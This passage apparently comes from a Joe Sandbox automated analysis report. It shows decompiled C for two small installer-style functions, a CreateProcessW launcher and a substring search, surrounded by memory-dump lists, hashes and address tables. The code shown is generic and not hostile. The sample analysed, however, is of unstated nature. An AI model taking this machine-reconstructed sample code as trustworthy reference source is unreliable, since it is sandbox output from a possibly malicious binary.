                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                                  • Opcode ID: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                  • Instruction ID: 93d8fc7429a3309a4d5f32771a2db5550657aa0780c74b0d1fda1c3346d9b8f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A01BC71100709ABDB205F01ED80BDB3A26EB9135AF604037FA00762E0C37A8CD29E6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E004059D1(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x45e730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x45e730,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                                  0x004059da
                                                                                                                                                                                                  0x004059fa
                                                                                                                                                                                                  0x00405a02
                                                                                                                                                                                                  0x00405a07
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405a0d
                                                                                                                                                                                                  0x00405a11

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                  • Opcode ID: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                  • Instruction ID: 7eb9064dadea35cbfc58acd36067de01cdd5d52a4e03f37d51203587584f4729
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E012B0610209BFEB00AFA0ED49F7B7AACFB08204F008921BD00F2191D774A9148A68
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00405E43(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                                                  0x00405e53
                                                                                                                                                                                                  0x00405e55
                                                                                                                                                                                                  0x00405e58
                                                                                                                                                                                                  0x00405e84
                                                                                                                                                                                                  0x00405e5d
                                                                                                                                                                                                  0x00405e66
                                                                                                                                                                                                  0x00405e6b
                                                                                                                                                                                                  0x00405e76
                                                                                                                                                                                                  0x00405e79
                                                                                                                                                                                                  0x00405e95
                                                                                                                                                                                                  0x00405e7b
                                                                                                                                                                                                  0x00405e82
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405e82
                                                                                                                                                                                                  0x00405e8e
                                                                                                                                                                                                  0x00405e92
                                                                                                                                                                                                  0x00405e92
                                                                                                                                                                                                  0x00405e8c
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6B
                                                                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                  • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%